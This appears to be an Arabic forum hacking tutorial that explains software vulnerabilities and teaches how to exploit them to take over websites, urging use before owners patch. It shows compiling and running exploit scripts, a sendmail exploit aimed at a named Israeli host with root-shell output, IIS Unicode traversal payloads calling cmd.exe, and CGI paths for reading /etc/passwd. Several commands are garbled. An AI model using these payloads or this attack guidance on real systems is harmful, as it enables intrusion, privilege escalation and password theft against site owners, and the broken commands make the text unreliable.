س.ماهي الثغرات ومامعناها
الثغرات هي ضعف امني يساعد في دخول النظام معين واختراقه وقد تكون أيضا الطريقه المساعدة التي تخليك تتحول من user الي administrator يعني من مستخدم الي المدير المتصرف وتتضمن ويجب علي الدوام معرفه الثغرات الامنيه الجديدة واستثمارها علشان لا ينتبه أصحاب المواقع بها يرقعوها يتم تقفيلها واقرب مثال لهذه الثغرات الضعف الأمني الذي اكتشف في الاباتشي وهو سيرفر يركب علي نظام ليونكس واي ضعف في احد البرامج او قاعدة بناء الموقع تعتبر ثغرة ومن الممكن استخدمها والاستفاده منها في اختراق الموقع المراد اختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ماتريد عن طريقها

كيف استثمر الثغره اذا لقيتها
من وقت ما اكتشفوا الثغرات كانت نسبه 99% من الثغرات تكون سكربتا تها مكتوبه بالغه c وتحتاج لمعرفة اللغه او عليك تحويلها

كما ان هناك العديد من الثغرات تحتاج الي shell حتي تتمكن من الاستفاده من هذه الثغره او بمعني اخر الضعف وعلي سبيل المثال بعض الثغرات الموجوده في PHP تحتاج الي shell PHP
الضعف يكون في الاصدارت الخاصه
فيع ثغره من نوع Kernel 2.2.x ولكن هذه المره في نظام تشغيل ليونكس
ملاحظه
هذه الثغرات تكون بالغه c تكون سيكربتات توجد في الموقع
وهناك أيضا سيكربتات اخري مكتوبه بالغه perl لازم تكون في هذه الحاله مركب لوينكس علشان الأوامر وانصح تركيب Linux Redhat 7.3
لانه افضل من الماند ريك والماندريك صوره مبسطه للريدهات غير قابل للتطور وان الريد هات اقوي

طريقه تحويل لغه البيرل
الطريقه سهله كلها أوامر في البدايه تكتب هذا الامر
./ lp.file
يعطيك هذه الرساله
Access Denied هذه الرساله توضح عدم الموافقه اذا صار لك كذا تكتب الامر
chmod + x conik.pl لاحظ مكان كونيك تكتب اسم الملف
وشغله مره ثانيه وشوف النتيجه راح تكون زي كذا $./conik.pl

ولغه c
تحويل الملف لازم انت تخلي الملف يكون ملف تنفيذي بالامر التالي
gcc-o conik conik.c
وراح يكون الملف جاهز بعد هذا الامر
./conik.c
وبعد ماصار الملف جاهز
gcc -o sendmail.c$
./sendemmail $
usage:sendmail <host> <os > user password
$./ sendmail smtp.israel.com RedHat-7.3 anonymous anonymous-----
تكتب الموقع اللي تبغاه مكان Israel
connecting to host connected...
id
uid=0 root gid=0 root
لاحظ انه طلب منا الملقم للبرنامج sendemail وطلب نظام التشغيل واليوز والباسورد واعطنا البرنامج امتياز root بسب قيام البرنامج بتنفيذ Exan nofer
لاتظن ان لما حطيت البرنامج xxx.sendmail بدون أي سبب انا حطيت للك هذا المثال لانه هناك ثغره في هذ البرنامج وراح اشرحها ان شاء الله ابيك تحفظ الاسم
ماهي conik هذا الطريقه يبي لها نظام تشغيل ولغه c و perl ؟
ثغرة تستخدم من خلال المتصفح يعني انت تشوف معلومات الموقع عبر المتصفح وتوصل الي ملف الباسوردات من هذه الطريقه ومثال علي هذه الثغرات PHP-CGI-UNICODE-VB-ETC
UNICODE هي عباره عن ضعف في نظام IIS في Microsoft تساعد في اختراق الموقع بكل سهوله هذي طريقة الاختراق بهاذي الطريقه
امثله علي ثغرت UNICODE
/-vti -bin/..%25%35%63..0%25%35%36..25%35%36%..25%35%36..%25% 35%36%../winnt/system32/cmd.exe? c+dir+c:/

اما ثغرات CGI مثال
cgi-bin/view-source?../../../../../../../etc/passwd
cgi-bin/phf
cgi-bin/wwwboard.pl
cgi-bin/AT-admin.cgi

هذا ما استطعت تقديمه من درس اختراق الهاك لاختراق المواقع



السميم /هكرز الصحراء